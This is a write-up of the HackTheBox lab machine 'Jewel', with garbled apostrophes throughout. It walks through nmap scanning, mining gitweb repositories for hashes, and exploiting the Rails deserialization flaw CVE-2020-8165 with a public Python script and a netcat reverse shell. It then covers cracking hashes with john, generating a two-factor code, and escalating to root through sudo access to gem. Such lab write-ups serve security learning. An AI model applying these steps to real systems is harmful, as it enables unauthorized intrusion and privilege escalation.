Jewel Walkthrough
Hey Everyone! Today we have one of HackTheBox machines, โJewelโ. Itโs a medium machine and depends on CVE for the exploitation process, before we get started letโs see its info

Enumeration
At The first step, we will try to enumerate the box to collect information like:
Open ports
Hidden directories, parameter discovery, leaked secrets, etc. โIf we have websiteโ
Security modes for all servers and ports
So, we will start with Nmap
nmap -A -T4 10.10.10.211

We have 3 open ports 22/8000/8080
It seems that we have 2 websites working on these 2 ports 8000/8080
so letโs check them
http://10.10.10.211:8080

We have a webpage with http-title Bl0G
. Letโs check the second one
http://10.10.10.211
:8000

It redirects us to http://10.10.10.211:8000/gitweb
and after searching about whatโs gitweb
Iโve found this result

I know that Iโve access to read or write to the Bl0G
repos, so letโs check the files, to try to find any secrets or any other information.
After spending a little time searching for any juicy file name database/login/users
or any other keyword, Iโve found these results

And for filesโฆ

I know that the Bl0G
the website works on the rails framework, and also I've sql
file, after checking it...

Iโve 2 usernames and 2 hashes, Iโve tried to crack them using hashcat
but it fails, so I think itโs a rabbit hole :(
But all, letโs save them into any file and continue our enumeration.
After searching for a rails version, Iโve found that it works on rails 5.2.2.1

After searching for RCE CVEโs for this version, Iโve found CVE 2020โ8165

Okay, letโs try to exploit itโฆ
Server Foothold & User Flag
After searching for any public exploit

Exploit details
Deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.
How to exploit manually?
Generate a payload from this repo
Use this payload to change your username
Refresh the
/articles
page to show your payload name
For the first one, Iโve problems with ruby
the version which requires a specific version to run the exploit, to save my time Iโve used the second one which is written in python for this machine, and will exploit it also
After checking the exploit code to know how it works, here are the exploit arguments
python3 rev.py 10.10.xx.xx port

After trying to execute it, I faced a problem with a hex character, so I added a line to encode it

Letโs run it and listen on our port using netcat

It works and we get the user flag.
Root Flag
For now, I need to enumerate this box to find any important info which led me the root account so instead of searching and enumerating the box manually cmd by cmd, I used LinPEAS
automation tool which helps you find sensitive info and enumerate the server
After using it Iโve found these hashes

And after enumerating the backup file in /var/backups/dump_2020_08_27.sql
Iโve found also another hash. For now, Iโve 3 hashed and 2 from the enumeration step at the first

Letโs try to break them all using hashcat
or john

As you can see john
cracked one of them, and we have a password spongebob
Iโve tried to use this password for the root account, but it fails.
Letโs check our home directory

We have a google_authenticator
code seems interesting
Iโve tried to check my privileges by typing sudo -l
but it requires a password which is spongebob
and the Google authenticator verification code
So, Iโve used Google authenticator online service to generate the verification code as you can see

And type sudo -l
and inserting the password and the code
Note: Your machine timezone MUST be the same with the server timezone โThis is the mechanism which google authenticator worksโ
If the timezones isnโt the same, the code will expire for the server but it still active for your machine, hereโs the point !!
After trying to know our privileges by sudo -l

Iโve permission to execute /usr/bin/gem
as a root without requiring a password
After searching for how to escape from gem
Iโve found this resource

You have 3 ways to open a shell from gem
, you can use anyone of them.
Iโve used the first one and opens a root shell

Stay in touch
Last updated